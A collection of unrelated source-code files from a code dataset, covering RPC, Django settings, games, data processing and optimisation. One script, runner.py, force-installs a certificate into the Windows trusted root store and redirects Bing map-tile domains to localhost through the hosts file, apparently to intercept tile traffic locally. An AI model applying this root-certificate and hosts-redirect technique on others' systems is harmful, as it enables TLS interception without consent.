{"seq_id":"286389795","text":"# 11652.py\n# 2018.06.06\n\nimport sys\n\np = list(map(int, sys.stdin.readlines()))\np.sort()\nanw, anw_cnt, cnt = p[0], 1, 1\n\nfor i in range(1, len(p)):\n\tcnt = 1 if p[i] != p[i-1] else cnt+1\n\tif cnt > anw_cnt:\n\t\tanw = p[i]\n\t\tanw_cnt = cnt\nprint(anw)\n\n# Sort, then compare each value with the previous one and count.\n","sub_path":"11000/11652.py","file_name":"11652.py","file_ext":"py","file_size_in_byte":303,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"339291422","text":"# coding: utf8\n\n__all__ = [\"Stub\", \"Refer\"]\n__authors__ = [\"Tim Chow\"]\n\nimport inspect\nimport logging\nimport threading\nfrom functools import partial\n\nfrom .transport import *\nfrom .serializer import *\nfrom .cluster import *\nfrom .protocol import Protocol\nfrom .helper import *\nfrom .decorator import *\nfrom .connection import *\nfrom .request import Request\nfrom .exception import *\nfrom .heartbeat import *\nfrom .refer_argument import ReferArgument\nfrom .connection_pool import get_connection_from_pool\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass Stub(object):\n    def __init__(self):\n        self._transport = None\n        self._serializer = None\n        self._cluster = None\n        self._protocol = None\n\n    def set_transport(self, transport):\n        if not isinstance(transport, Transport):\n            raise TypeError(\"expect Transport, not %s\" % type(transport).__name__)\n        self._transport = transport\n        return self\n\n    def set_serializer(self, serializer):\n        if not isinstance(serializer, Serializer):\n            raise TypeError(\"expect Serializer, not %s\" % type(serializer).__name__)\n        self._serializer = serializer\n        return self\n\n    def set_cluster(self, cluster):\n        if not isinstance(cluster, Cluster):\n            raise TypeError(\"expect Cluster, not %s\" % type(cluster).__name__)\n        self._cluster = cluster\n        return self\n\n    def set_protocol(self, protocol):\n        if not isinstance(protocol, Protocol):\n            raise TypeError(\"expect Protocol, not %s\" % type(protocol).__name__)\n        self._protocol = protocol\n        return self\n\n    def refer(self, class_object, refer_argument=None):\n        if not inspect.isclass(class_object):\n            raise TypeError(\"expect class, not %s\" % type(class_object).__name__)\n        if refer_argument is None:\n            refer_argument = ReferArgument()\n\n        if self._transport is None:\n            raise RuntimeError(\"transport must be provided\")\n        if self._serializer is None:\n            raise RuntimeError(\"serializer must be provided\")\n        if self._cluster is None:\n            raise RuntimeError(\"cluster must be provided\")\n        if self._protocol is None:\n            raise RuntimeError(\"protocol must be provided\")\n\n        return Refer(class_object,\n                     self._transport,\n                     self._serializer,\n                     self._cluster,\n                     self._protocol,\n                     self.heartbeat_func,\n                     refer_argument)\n\n    def close(self):\n        if self._cluster is not None:\n            self._cluster.close()\n            self._cluster = None\n\n    def heartbeat_func(self):\n        class_name = HeartBeatRequest.__name__\n        export = get_export(HeartBeatRequest)\n        if export is not None:\n            class_name = export[\"name\"]\n\n        method_name = \"send\"\n        provide = get_provide(HeartBeatRequest.send)\n        if provide is not None:\n            if provide[\"filtered\"]:\n                raise RuntimeError(\"HeartBeatRequest.send is filtered\")\n            method_name = provide[\"name\"]\n\n        request = Request()\n        request.class_name = class_name\n        request.method_name = method_name\n        request.args = tuple()\n        request.kwargs = dict()\n        request.meta = None\n\n        return self._serializer.dumps(request)\n\n\nclass Refer(object):\n    def __init__(self,\n                 class_object,  # the class or interface being referred to\n                 transport,  # transport layer\n                 serializer,  # serialization layer\n                 cluster,  # cluster layer for load balancing; contains the Registry\n                 protocol,  # protocol layer; contains the Filters and the Invoker\n                 heartbeat_func,  # calling this returns a serialized heartbeat request\n                 refer_argument):\n        self._class_object = class_object\n        self._transport = transport\n        self._serializer = serializer\n        self._cluster = cluster\n        self._heartbeat_func = 
heartbeat_func\n        self._protocol = protocol\n        self._refer_argument = refer_argument\n        self._connection_pool = refer_argument.connection_pool_class(\n            refer_argument.connection_pool_size,\n            refer_argument.connections_per_key)\n\n        self._class_name = self._class_object.__name__\n        export = get_export(self._class_object)\n        if export is not None:\n            self._class_name = export[\"name\"]\n\n    def __getattr__(self, attr_name):\n        attr = getattr(self._class_object, attr_name, None)\n        if attr is None:\n            raise AttributeError(\"instance of %s has no attribute: %s\" % (\n                self._class_object.__name__, attr_name))\n        if not inspect.ismethod(attr):\n            return attr\n\n        method_name = attr_name\n        provide = get_provide(attr)\n        if provide is not None:\n            if provide[\"filtered\"]:\n                raise RuntimeError(\"method %s.%s is not exported\" %\n                                   (self._class_name, attr_name))\n            method_name = provide[\"name\"]\n        return self._dynamic_proxy(method_name)\n\n    def _connection_factory(self, host, port):\n        sock = ClientSocketBuilder() \\\n            .with_host(host) \\\n            .with_port(port) \\\n            .with_tcp_no_delay() \\\n            .with_blocking() \\\n            .with_timeout(self._refer_argument.client_socket_timeout) \\\n            .build()\n        connection = self._refer_argument.connection_class(sock,\n                                                           self._transport,\n                                                           self._refer_argument.max_pending_writes,\n                                                           self._refer_argument.max_pending_reads,\n                                                           self._refer_argument.max_pooling_reads,\n                                                           self._refer_argument.write_timeout,\n                                                           self._refer_argument.heartbeat_interval,\n                                                           self._heartbeat_func)\n        return connection\n\n    def _get_connection_context(self, method_name):\n        # Get the address of the remote service to connect to\n        remote = self._cluster.get_remote(\n            self._class_name,\n            method_name,\n            self._transport.get_name(),\n            self._serializer.get_name())\n        if remote is None:\n            raise NoRemoteServerError(\n                \"there is no remote server\")\n        return get_connection_from_pool(\n            self._connection_pool,\n            remote,\n            partial(self._connection_factory, remote[0], remote[1]))\n\n    def _dynamic_proxy(self, method_name):\n        def _inner(*args, **kwargs):\n            # Build the Request object\n            request = Request()\n            request.class_name = self._class_name\n            request.method_name = method_name\n            request.args = args\n            request.kwargs = kwargs\n\n            return self._protocol.invoke(\n                request,\n                self._get_connection_context(method_name),\n                self._serializer,\n                self._refer_argument.write_timeout,\n                self._refer_argument.read_timeout)\n        return _inner\n\n    def refer_close(self):\n        # Close the connection pool\n        self._connection_pool.close()\n\n","sub_path":"summerrpc/stub.py","file_name":"stub.py","file_ext":"py","file_size_in_byte":7354,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"252760660","text":"import os\nfrom setuptools import setup\n\n# Eigen version - peigen version\n__version__ = '0.0.9'\n\npackages = []\nfor root, dirs, files in os.walk('.'):\n    if not root.startswith('./build') and '__init__.py' in files:\n        packages.append(root[2:])\n\n#data_files = []\n#package_data = []\n#for root, dirs, files in os.walk(\"include\"):\n#    root_files = [os.path.join(root, i) for i in files]\n#    data_files.append((root, root_files))\n#    for f in files:\n#        package_data.append(os.path.join(root, f))\n\n#print(data_files)\n#print(package_data)\n\nsetup(\n    name = 'peigen',\n    packages = packages,\n    version = __version__,\n    description = 'Python wrapper for Eigen C++ header',\n    author = 'Fred Moolekamp',\n    author_email = 'fred.moolekamp@gmail.com',\n    url = 'https://github.com/fred3m/peigen',\n    keywords = ['eigen', 'numerical'],\n    #package_data={\"peigen\":package_data},\n    #data_files=data_files,\n    
zip_safe=False,\n include_package_data=True,\n)","sub_path":"pypi_install_script/peigen-0.0.9.tar/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"85455424","text":"import random\nfrom value_of_ace import *\nfrom sanitize_user_input import *\n\ndef userTurn(user_sum):\n want_to_play = \"yes\"\n hit_or_stand_input = input(\"Your current sum is \" + str(user_sum) + \". Would you like to stand or hit?\\n\")\n hit_or_stand = sanitizeInputForHitOrStand(hit_or_stand_input)\n\n while hit_or_stand == \"hit\":\n new_user_card = valueOfAce(random.randint(1, 10), user_sum)\n user_sum += new_user_card\n\n if user_sum > 21:\n want_to_play_input = input(\"Your current sum is \" + str(user_sum) + \". It looks like you bust!\\nDealer wins. Better luck next time!\\nWould you like to play again?\\n\")\n want_to_play = sanitizeInputForWantToPlay(want_to_play_input)\n break\n else:\n hit_or_stand_input = input(\"Your current sum is \" + str(user_sum) + \". Would you like to stand or hit?\\n\")\n hit_or_stand = sanitizeInputForHitOrStand(hit_or_stand_input)\n\n return user_sum, want_to_play\n\n\ndef dealerTurn(dealer_sum):\n final_dealer_sum = dealer_sum\n if dealer_sum > 16:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to stand with a sum of \" + str(final_dealer_sum) + \".\")\n else:\n while final_dealer_sum <= 16:\n new_dealer_card = valueOfAce(random.randint(1, 10), final_dealer_sum)\n final_dealer_sum += new_dealer_card\n\n if final_dealer_sum > 21:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to hit and busts with a sum of \" + str(final_dealer_sum) + \".\")\n else:\n print(\"Ok. The dealer's sum is \" + str(dealer_sum) + \". The dealer has decided to hit and stands with a sum of \" + str(final_dealer_sum) + \".\")\n\n return final_dealer_sum\n","sub_path":"player_turns.py","file_name":"player_turns.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"43144999","text":"# #!/usr/bin/env python3\n# # -*- coding: utf-8 -*-\n\n# đề bài: https://imgur.com/a/xb8Z5VF\n\narr = [2, 4, 1, 9, 8] # 25\narr = [1,2,3] # 7\narr.sort()\n\nSum = 1\nfor i in arr:\n\tSum = Sum + i\n\t\nif arr[0] != 1:\n\tprint(1)\nelse:\n\tminMoney = 0\n\tfor i in range(len(arr)-1):\n\t\tminMoney = minMoney + arr[i]\n\t\tif arr[i+1] > minMoney+1:\n\t\t\tprint(minMoney+1)\n\t\t\texit()\n\t\tprint(Sum)\n\t\texit()\n\t\t\t\n\n\n","sub_path":"leothang.py","file_name":"leothang.py","file_ext":"py","file_size_in_byte":384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"357749904","text":"from base import *\nimport dj_database_url\n\n\nDEBUG = False\n\nADMINS = [\n ('Phil Gyford', 'phil@gyford.com'),\n]\n\nMANAGERS = ADMINS\n\n# Uses DATABASE_URL environment variable:\nDATABASES = {'default': dj_database_url.config()}\nDATABASES['default']['CONN_MAX_AGE'] = 500\n\nEMAIL_BACKEND = 'django.core.mail.backends.smtp.EmailBackend'\nEMAIL_HOST = 'smtp.sendgrid.net'\nEMAIL_HOST_USER = get_env_variable('SENDGRID_USERNAME')\nEMAIL_HOST_PASSWORD = get_env_variable('SENDGRID_PASSWORD')\nEMAIL_PORT = 587\nEMAIL_USE_TLS = True\n\n# If you *don't* want to prepend www to the URL, remove the setting from\n# the environment entirely. 
Otherwise, set to 'True' (or anything tbh).\nPREPEND_WWW = True\n\n# See https://devcenter.heroku.com/articles/memcachier#django\nenviron['MEMCACHE_SERVERS'] = get_env_variable('MEMCACHIER_SERVERS').replace(',', ';')\nenviron['MEMCACHE_USERNAME'] = get_env_variable('MEMCACHIER_USERNAME')\nenviron['MEMCACHE_PASSWORD'] = get_env_variable('MEMCACHIER_PASSWORD')\n\nCACHES = {\n 'default': {\n 'BACKEND': 'django_pylibmc.memcached.PyLibMCCache',\n\n # Use binary memcache protocol (needed for authentication)\n 'BINARY': True,\n\n # TIMEOUT is not the connection timeout! It's the default expiration\n # timeout that should be applied to keys! Setting it to `None`\n # disables expiration.\n 'TIMEOUT': None,\n\n 'OPTIONS': {\n # Enable faster IO\n 'tcp_nodelay': True,\n\n # Keep connection alive\n 'tcp_keepalive': True,\n\n # Timeout settings\n 'connect_timeout': 2000, # ms\n 'send_timeout': 750 * 1000, # us\n 'receive_timeout': 750 * 1000, # us\n '_poll_timeout': 2000, # ms\n\n # Better failover\n 'ketama': True,\n 'remove_failed': 1,\n 'retry_timeout': 2,\n 'dead_timeout': 30,\n }\n }\n}\n\n# A sample logging configuration. The only tangible logging\n# performed by this configuration is to send an email to\n# the site admins on every HTTP 500 error when DEBUG=False.\n# See http://docs.djangoproject.com/en/dev/topics/logging for\n# more details on how to customize your logging configuration.\nLOGGING = {\n 'version': 1,\n 'disable_existing_loggers': False,\n 'filters': {\n 'require_debug_false': {\n '()': 'django.utils.log.RequireDebugFalse'\n }\n },\n 'handlers': {\n 'mail_admins': {\n 'level': 'ERROR',\n 'filters': ['require_debug_false'],\n 'class': 'django.utils.log.AdminEmailHandler'\n },\n 'null': {\n 'class': 'logging.NullHandler',\n },\n },\n 'loggers': {\n 'django.request': {\n 'handlers': ['mail_admins'],\n 'level': 'ERROR',\n 'propagate': True,\n },\n 'django.security.DisallowedHost': {\n 'handlers': ['null'],\n 'propagate': False,\n },\n }\n}\n\n# https\nSECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https')\nSECURE_SSL_REDIRECT = True\nSESSION_COOKIE_SECURE = True\nCSRF_COOKIE_SECURE = True\n# HSTS\nSECURE_HSTS_SECONDS = 31536000 # 1 year\nSECURE_HSTS_INCLUDE_SUBDOMAINS = True\nSECURE_HSTS_PRELOAD = True\n\n# Sentry\n# https://devcenter.heroku.com/articles/sentry#integrating-with-python-or-django\n# via https://simonwillison.net/2017/Oct/17/free-continuous-deployment/# Step_4_Monitor_errors_with_Sentry_75\n\nSENTRY_DSN = os.environ.get('SENTRY_DSN')\n\nif SENTRY_DSN:\n INSTALLED_APPS += (\n 'raven.contrib.django.raven_compat',\n )\n RAVEN_CONFIG = {\n 'dsn': SENTRY_DSN,\n 'release': os.environ.get('HEROKU_SLUG_COMMIT', ''),\n }\n\n\n#############################################################################\n# PEPYSDIARY-SPECIFIC SETTINGS.\n\nGOOGLE_ANALYTICS_ID = 'UA-89135-2'\n\n# From https://www.google.com/recaptcha/\nRECAPTCHA_PUBLIC_KEY = get_env_variable('RECAPTCHA_PUBLIC_KEY')\nRECAPTCHA_PRIVATE_KEY = get_env_variable('RECAPTCHA_PRIVATE_KEY')\nRECAPTCHA_USE_SSL = True\n\n# Do we use Akismet/TypePad spam checking?\n# True/False. 
If false, no posted comments are checked.\n# If True, AKISMET_API_KEY must also be set.\nUSE_SPAM_CHECK = get_env_variable('USE_SPAM_CHECK')\n\n# From http://akismet.com/\nAKISMET_API_KEY = get_env_variable('AKISMET_API_KEY')\n\n# From http://mapbox.com/\nMAPBOX_MAP_ID = get_env_variable('MAPBOX_MAP_ID')\nMAPBOX_ACCESS_TOKEN = get_env_variable('MAPBOX_ACCESS_TOKEN')\n","sub_path":"pepysdiary/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"513303421","text":"class MoleculePrettyPrinter():\n def __init__(self):\n pass \n\n def pretty_print_molecule(self, compound):\n compoundList = []\n splitIndice = []\n result = []\n for i in range(0, len(compound) - 1):\n if (compound[i].isdigit() and not compound[i + 1].isdigit()):\n splitIndice.append(i + 1)\n elif (not compound[i].isdigit() and compound[i + 1].isdigit()):\n splitIndice.append(i + 1)\n splitIndice.insert(0, 0)\n splitIndice.insert(len(splitIndice), len(compound))\n for i in range(0, len(splitIndice) - 1):\n compoundList.append(compound[splitIndice[i] : splitIndice[i + 1]])\n for element in compoundList:\n newElement = element\n if element.isdigit():\n newElement = \"_{\" + element + \"}\"\n result.append(newElement)\n return \"${}$\".format(\"\".join(result))\n","sub_path":"workspace/lineplot/MoleculePrettyPlotPrinter.py","file_name":"MoleculePrettyPlotPrinter.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"253184373","text":"import atexit\nfrom python_hosts import Hosts, HostsEntry\nimport subprocess\n\nimport urllib3\nfrom python_hosts import Hosts, HostsEntry\n\nurllib3.disable_warnings()\n\n\ndef add_cert():\n subprocess.run([\"certutil\", \"-addstore\", \"-f\", \"root\",\n \".\\certs\\cert.crt\"], shell=True, check=True)\n\nmy_hosts = Hosts()\ndomains = ['kh.ssl.ak.tiles.virtualearth.net', 'khstorelive.azureedge.net']\n\n# origin_ips = {}\n# dns_resolver = dns.resolver.Resolver()\n# dns_resolver.nameservers = ['8.8.8.8']\n# for d in domains:\n# origin_ips[d] = dns_resolver.query(d)[0].to_text()\n\ndef override_hosts():\n for domain in domains:\n my_hosts.remove_all_matching(name=domain)\n new_entry = HostsEntry(\n entry_type='ipv4', address='127.0.0.1', names=[domain])\n my_hosts.add([new_entry])\n my_hosts.write()\n\ndef restore_hosts():\n for domain in domains:\n my_hosts.remove_all_matching(name=domain)\n my_hosts.write()","sub_path":"src/runner.py","file_name":"runner.py","file_ext":"py","file_size_in_byte":952,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"401724483","text":"\"\"\"Sqlite database wrapper.\"\"\"\n\nfrom itertools import chain\nfrom pathlib import Path\nfrom time import time\nfrom typing import Iterable, List, Tuple\n\nfrom . 
import scan, page\nfrom .initializer import DotSlipbox\n\nclass Slipbox:\n \"\"\"Slipbox main functions.\"\"\"\n def __init__(self, dot: DotSlipbox):\n self.conn = dot.database()\n self.dot = dot\n self.config = dot.config\n\n @property\n def basedir(self) -> Path:\n \"\"\"Return base directory regardless of current working directory.\"\"\"\n return self.dot.parent\n\n @property\n def timestamp(self) -> float:\n \"\"\"Get timestamp from Meta table.\"\"\"\n cur = self.conn.cursor()\n cur.execute(\"SELECT * FROM Meta WHERE key = 'timestamp'\")\n _, value = cur.fetchone()\n return value\n\n @timestamp.setter\n def timestamp(self, value: float) -> None:\n \"\"\"Set timestamp in Meta table.\"\"\"\n self.conn.execute(\"UPDATE Meta SET value = ? WHERE key = 'timestamp'\", (value,))\n self.conn.commit()\n\n def close(self) -> None:\n \"\"\"Close database connection.\"\"\"\n self.conn.close()\n\n def __enter__(self) -> \"Slipbox\":\n return self\n\n def __exit__(self, exc_type, exc_value, traceback) -> None: # type: ignore\n self.close()\n\n def find_new_notes(self) -> Iterable[Path]:\n \"\"\"Yield files that are not yet in the database.\"\"\"\n patterns = self.dot.patterns\n for path in self.basedir.rglob('*'):\n if path.is_file() and scan.has_valid_pattern(path, patterns) \\\n and not scan.is_file_in_db(path.relative_to(self.basedir), self.conn):\n yield path\n\n def purge(self) -> Tuple[List[Path], List[Path]]:\n \"\"\"Purge outdated/missing files from database.\n\n Also delete old sections.\n \"\"\"\n modified = []\n deleted = []\n sql = \"SELECT filename FROM Files\"\n timestamp = self.timestamp\n cur = self.conn.cursor()\n cur.execute(\"PRAGMA foreign_keys=ON\")\n for filename, in cur.execute(sql):\n path = self.basedir/filename\n if not path.exists():\n deleted.append(filename)\n elif scan.is_recently_modified(timestamp, path):\n modified.append(filename)\n cur.executemany(\"DELETE FROM Files WHERE filename IN (?)\",\n ((filename,) for filename in chain(modified, deleted)))\n\n # Delete unused html content\n cur.execute(\"DELETE FROM Html WHERE id NOT IN (SELECT html FROM Sections)\")\n self.conn.commit()\n return modified, deleted\n\n def process(self, paths: Iterable[Path]) -> None:\n \"\"\"Process input files.\"\"\"\n inputs = list(set(paths))\n for batch in scan.group_by_file_extension(inputs):\n scan.process_batch(self.conn, list(batch), self.config, self.basedir)\n self.timestamp = time()\n\n def compile(self) -> None:\n \"\"\"Compile processed HTML into final output.\"\"\"\n options = self.config.get(\"slipbox\", \"document_options\")\n page.generate_complete_html(self.conn, options, self.basedir)\n\n def run(self) -> None:\n \"\"\"Run all steps needed to compile output.\"\"\"\n self.purge()\n notes = self.find_new_notes()\n self.process(notes)\n self.compile()\n","sub_path":"cli/slipbox/slipbox.py","file_name":"slipbox.py","file_ext":"py","file_size_in_byte":3324,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"571494104","text":"#!/usr/bin/python\n# -*- coding:utf-8 -*-\n\nfrom pyspark import SparkContext, SparkConf\nfrom operator import add\nconf = SparkConf()\\\n.setAppName(\"wordcount_demo\")\nsc = SparkContext(conf=conf)\nlines = sc.textFile(\"/data/data.log\")\nwords = lines.flatMap(lambda line: line.split(','))\npairs = words.map(lambda word: (word, 1))\nwordCounts = pairs.reduceByKey(add)\noutput = wordCounts.collect()\nfor (word, count) in output:\n print (\"%s: %i\\n\" % (word, 
count))\nsc.stop()","sub_path":"2017-5/spark00/wordcount/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"360645153","text":"# Copyright 2018 The TensorFlow Probability Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ============================================================================\n\"\"\"Functions for computing gradients.\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\n\nimport tensorflow as tf\n\n\n__all__ = [\n 'value_and_gradient',\n]\n\n\ndef value_and_gradient(f, xs, watch_accessed_variables=True, name=None):\n \"\"\"Computes `f(*xs)` and its gradients wrt to `*xs`.\n\n Args:\n f: Python `callable` to be differentiated. If `f` returns a scalar, this\n scalar will be differentiated. If `f` returns a tensor or list of tensors,\n by default a scalar will be computed by adding all their values to produce\n a single scalar. If desired, the tensors can be elementwise multiplied by\n the tensors passed as the `dy` keyword argument to the returned gradient\n function.\n xs: Python list of parameters of f for which to differentiate. (Can also\n be single `Tensor`.)\n watch_accessed_variables: Boolean controlling whether the tape will\n automatically `watch` any (trainable) variables accessed while the tape is\n active. 
Defaults to True meaning gradients can be requested from any\n result computed in the tape derived from reading a trainable `Variable`.\n If False users must explicitly `watch` any `Variable`s they want to\n request gradients from.\n Default value: `True`.\n name: Python `str` name prefixed to ops created by this function.\n Default value: `None` (i.e., `'value_and_gradient'`).\n\n Returns:\n y: `y = f(*xs)`.\n dydx: Gradient of `y` wrt each of `xs`.\n \"\"\"\n with tf.name_scope(name, 'value_and_gradient', [xs]):\n is_xs_list_like = isinstance(xs, (tuple, list))\n if not is_xs_list_like:\n xs = [xs]\n xs = [tf.convert_to_tensor(value=x, name='x{}'.format(i))\n for i, x in enumerate(xs)]\n with tf.GradientTape(\n persistent=len(xs) > 1,\n watch_accessed_variables=watch_accessed_variables) as tape:\n for x in xs:\n tape.watch(x)\n y = tf.convert_to_tensor(value=f(*xs), name='y')\n dydx = [tape.gradient(y, x) for x in xs]\n if not is_xs_list_like:\n dydx = dydx[0]\n return y, dydx\n","sub_path":"tensorflow_probability/python/math/gradient.py","file_name":"gradient.py","file_ext":"py","file_size_in_byte":2793,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"616953048","text":"def strRev(string) :\n chars = list()\n n = 0\n output = str()\n\n for i in string :\n chars.append(i)\n\n n = len(chars) - 1\n\n while n >= 0 :\n output = output + chars[n]\n n -= 1\n\n return output\n\ntest = str(input(\"Enter a string: \"))\nprint(\"The reversed string is: \" + strRev(test))","sub_path":"String/String-Reverse/Str-Rev-Function.py","file_name":"Str-Rev-Function.py","file_ext":"py","file_size_in_byte":316,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"104901231","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jul 06 10:49:55 2018\n\n@author: sjoer_000\n\"\"\"\nimport os\n\nimport pandas as pd\nimport pulp\n#%%\nINPUT_FOLDER = os.path.join(os.path.dirname(__file__), 'Data')\nOUTPUT_FOLDER = os.path.join(os.path.dirname(__file__), 'Output')\n\nJAAR = 2018\nDF_PREDICTIONS = pd.read_csv(os.path.join(INPUT_FOLDER, 'prediction_{jaar}.csv'))\n#%%\ndef bepaal_team(df_prediction, max_kosten, aantal_renners):\n '''\n Selects the team with the highest predicted score with constraints\n\n Uses linear programming. 
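A numeric sanity check for the value_and_gradient helper defined above, assuming an eager-execution runtime compatible with this 2018-era module (tf.name_scope is called here with its three-argument TF1 signature): for f(x) = sum(x**2) the value is 14 and the gradient is 2x.

import numpy as np
import tensorflow as tf

x = tf.constant([1.0, 2.0, 3.0])
y, dydx = value_and_gradient(lambda t: tf.reduce_sum(t ** 2), x)
np.testing.assert_allclose(y.numpy(), 14.0)                 # 1 + 4 + 9
np.testing.assert_allclose(dydx.numpy(), [2.0, 4.0, 6.0])   # elementwise 2x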
Selects riders based on\n df_prediction: contains riders, costs (in column 'Waarde') and predicted score\n ('prediction')\n max_kosten: maximum the riders can cost tomorrow\n aantal_renners: the exact number of riders that a team should contain\n '''\n\n prob = pulp.LpProblem('Rijderselectie', pulp.LpMaximize)\n\n riders = df_prediction['Rider'].values.tolist()\n kosten_dict = df_prediction.set_index('Rider').to_dict()['Waarde']\n punten_dict = df_prediction.set_index('Rider').to_dict()['prediction']\n\n # Rijder kan 0 of 1 x in selectie zitten\n rijder_geselecteerd = pulp.LpVariable.dict('Rider', riders, 0, 1, 'Integer')\n \n \n # Optimize for predicted points\n prob += pulp.lpSum([rijder_geselecteerd[i] * punten_dict[i] for i in riders]), 'Totaal aantal punten'\n \n prob += pulp.lpSum([rijder_geselecteerd[i] for i in riders]) == aantal_renners, 'Precies aantal renners in ploeg'\n prob += pulp.lpSum([rijder_geselecteerd[i] * kosten_dict[i] for i in riders]) <= max_kosten, 'Renners kosten samen niet meer dan max'\n\n prob.writeLP(\"Wielrenselectie.lp\")\n prob.solve()\n\n assert pulp.LpStatus[prob.status] == 'Optimal', 'Optimization failed!'\n\n chosen_riders = df_prediction[[bool(v.varValue) for v in prob.variables()]]\n return chosen_riders\n#%%\nMAX_KOSTEN_PER_JAAR = {2018: 150, 2017:100, 2016: 125}\nSELECTION = bepaal_team(MAX_KOSTEN_PER_JAAR[JAAR], 15, DF_PREDICTIONS)\n\nprint(SELECTION[['BIB', 'Rider']])\nprint(f'Aantal renners: {len(SELECTION)}')\nprint(f'Tot kosten: {SELECTION[\"Waarde\"].sum()}')\nprint(f'Verwachte score: {SELECTION[\"prediction\"].sum()}')\n#%%\nSELECTION.to_excel(os.path.join(OUTPUT_FOLDER, f'team_{JAAR}.xlsx'), index=False)\n","sub_path":"selecteerteam.py","file_name":"selecteerteam.py","file_ext":"py","file_size_in_byte":2237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"87023955","text":"# -*- encoding: utf-8 -*-\n##############################################################################\n#\n# OpenERP, Open Source Management Solution\n# Copyright (C) 2004-2009 Tiny SPRL (). All Rights Reserved\n# $Id$\n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
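As written, the module-level call in selecteerteam.py does not match the function it invokes: bepaal_team(df_prediction, max_kosten, aantal_renners) is called as bepaal_team(MAX_KOSTEN_PER_JAAR[JAAR], 15, DF_PREDICTIONS), and the read_csv filename interpolates {jaar} without an f-prefix even though the rest of the file already uses f-strings. A corrected sketch of those two lines:

DF_PREDICTIONS = pd.read_csv(os.path.join(INPUT_FOLDER, f'prediction_{JAAR}.csv'))
# Argument order must follow the signature: dataframe, budget, squad size.
SELECTION = bepaal_team(DF_PREDICTIONS, MAX_KOSTEN_PER_JAAR[JAAR], 15)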
If not, see .\n#\n##############################################################################\n\n\"\"\"adds a compute product_qty about prodlot_product_uom\"\"\"\n\nfrom osv import osv\n\nclass stock_report_prodlots(osv.osv):\n \"\"\"adds a compute product_qty with prodlot.product_uom\"\"\"\n _inherit = \"stock.report.prodlots\"\n\n def read(self,cr, uid, ids, fields=None, context=None, load='_classic_read'):\n \"\"\"overwrites read method to compute product qty with product uom in prodlot\"\"\"\n result = super(stock_report_prodlots, self).read(cr, uid, ids, fields, context, load)\n for res in result:\n if res.get('prodlot_id', False) and res.get('name', False):\n res['name'] = float(res['name']) * float(self.pool.get('stock.production.lot').browse(cr, uid, res['prodlot_id'][0]).product_uom.factor)\n return result\n\nstock_report_prodlots()","sub_path":"addons-community/pxgo_production_lot_valued/stock_report_prodlots.py","file_name":"stock_report_prodlots.py","file_ext":"py","file_size_in_byte":1773,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"29161452","text":"\"\"\"\n.. module:: Paths\n\nPaths\n*************\n\n:Description: Paths\n\nPaths de Minotauro para P50\n\n:Authors: HPAI-BSC\n\n:Version:\n\n:Created on: 15/06/2017 11:15\n\n\"\"\"\n\n__author__ = 'HPAI-BSC'\n\nwind_path = 'E:/Wind/' # en principio este path no vale para mino\n# wind_data = '/home/HPAI-BSC/storage/Data/Wind/files/'\n\nwind_data_path = 'E:/data_turbines/' #TODAS las turbinas en .npy\n\nwind_res_path = 'E:/Wind$JM/Res/' # directorios para dejar resultado\nwind_jobs_path = 'E:/Wind$JM/Jobs/' # directorios para almacenar jobs\n\njobs_code_path = 'E:/Wind' # path al codigo\njobs_root_path = 'E:/Wind$JM' # Arbol Res/Jobs/Run\n\n# los siguientes en Minotauro no se utilizan\n\nwind_NREL_data_path = 'E:/data_turbines/'\nremote_wind_data_path = 'E:/data_turbines/transformed/'\nremote_data = 'E:/data_turbines/transformed/'\n\n\n# Dummies\n\nwind_data_ext = 'E:/dummy/'\nbsc_path = 'E:/dummy/'\nwind_models_path = 